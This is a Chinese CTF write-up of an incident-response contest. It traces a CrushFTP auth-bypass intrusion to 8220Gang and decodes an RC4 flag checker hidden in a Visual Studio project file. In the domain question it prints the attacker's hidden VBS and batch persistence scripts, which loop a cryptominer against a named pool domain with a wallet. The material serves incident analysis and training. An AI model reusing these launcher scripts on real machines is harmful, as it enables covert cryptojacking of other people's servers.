2025 年 Solar 应急响应公益月赛 - 5 月

应急响应

攻击者使用什么漏洞获取了服务器的配置文件?

Challenge

某某文化有限公司的运维小王刚刚搭建服务器发现 cpu 莫名的异常的升高请你帮助小王排查一下服务器
pass:Ngy@667788
flag 格式为:flag

Solution

SolarIncidentResponse202505-4

在桌面发现应用 CrushFTP,搜索发现这篇文章漏洞预警 | CrushFtp 认证绕过漏洞 (CVE-2025-31161) | CTF 导航

1
flag{CVE-2025-31161}

攻击者 C2 服务器 IP 是什么?

Challenge

flag 格式为:flag

Solution

查看日志,筛选事件 ID5156

SolarIncidentResponse202505-5

1
flag{156.238.230.57}

系统每天晚上系统都会卡卡的帮小明找到问题出在了那?

Challenge

flag 为配置名称(无空格)
flag

Solution

SolarIncidentResponse202505-1

1
flag{sqlbackingup}

恶意域名是什么?

Challenge

flag 格式为:flag

Solution

查看 C:\Program Files\Microsoft SQL Server\90\Shared\sqlwsmprovhost.vbs 内容如下:

1
2
set ws=createobject("wscript.shell")
ws.Run """sqlwscript.cmd""",0

这个脚本创建一个 WScript.Shell 对象并使用该对象的 Run 方法运行名为 sqlwscript.cmd 的批处理文件

查看 sqlwscript.cmd 内容如下:

1
2
3
4
5
@echo off
cd /d "%~dp0"
:start
sqlwpr.exe -a rx/0 --url b.oracleservice.top --user 46E9UkTFqALXNh2mSbA7WGDoa2i6h4WVgUgPVdT9ZdtweLRvAhWmbvuY1dhEmfjHbsavKXo3eGf5ZRb4qJzFXLVHGYH4moQ -t 0
goto start

找到域名

1
flag{b.oracleservice.top}

疑似是什么组织发动的攻击?

Challenge

flag 格式为:flag {123XXX}(无空格注意大小写)

Solution

搜索上面的参数 46E9UkTFqALXNh2mSbA7WGDoa2i6h4WVgUgPVdT9ZdtweLRvAhWmbvuY1dhEmfjHbsavKXo3eGf5ZRb4qJzFXLVHGYH4moQ

SolarIncidentResponse202505-2

发现组织叫做 8220,进一步搜索 8220

SolarIncidentResponse202505-3

1
flag{8220Gang}

Reverse

开源项目

Challenge

Solution

ConsoleApplication2/ConsoleApplication2.vcxproj 中发现 base64 编码的字符串

1
JHRhcmdldCA9ICJMSERoMXgxemRJaVZTK2E1cVlKckJQYjBpeHFIVHhkK3VKLzN0Y2tVZE9xRyttbjExM0U9Ijskaz0iRml4ZWRLZXkxMjMhIjskZD1bU3lzdGVtLlRleHQuRW5jb2RpbmddOjpVVEY4LkdldEJ5dGVzKChSZWFkLUhvc3QgIui+k+WFpeWtl+espuS4siIpKTskcz0wLi4yNTU7JGo9MDswLi4yNTV8JXskaj0oJGorJHNbJF9dK1tieXRlXSRrWyRfJSRrLkxlbmd0aF0pJTI1Njskc1skX10sJHNbJGpdPSRzWyRqXSwkc1skX119OyRpPSRqPTA7JHI9QCgpOyRkfCV7JGk9KCRpKzEpJTI1Njskaj0oJGorJHNbJGldKSUyNTY7JHNbJGldLCRzWyRqXT0kc1skal0sJHNbJGldOyRyKz0kXy1ieG9yJHNbKCRzWyRpXSskc1skal0pJTI1Nl19OyBbU3lzdGVtLkNvbnZlcnRdOjpUb0Jhc2U2NFN0cmluZygkcikgLWVxICR0YXJnZXQ=

解码得到

1
$target = "LHDh1x1zdIiVS+a5qYJrBPb0ixqHTxd+uJ/3tckUdOqG+mn113E=";$k="FixedKey123!";$d=[System.Text.Encoding]::UTF8.GetBytes((Read-Host "输入字符串"));$s=0..255;$j=0;0..255|%{$j=($j+$s[$_]+[byte]$k[$_%$k.Length])%256;$s[$_],$s[$j]=$s[$j],$s[$_]};$i=$j=0;$r=@();$d|%{$i=($i+1)%256;$j=($j+$s[$i])%256;$s[$i],$s[$j]=$s[$j],$s[$i];$r+=$_-bxor$s[($s[$i]+$s[$j])%256]}; [System.Convert]::ToBase64String($r) -eq $target

发现是 RC4,密文是 LHDh1x1zdIiVS+a5qYJrBPb0ixqHTxd+uJ/3tckUdOqG+mn113E=,密钥是 FixedKey123!

解密得到 flag

1
flag{rqweripqwe[rqwe[rjqw[eprjqweprij}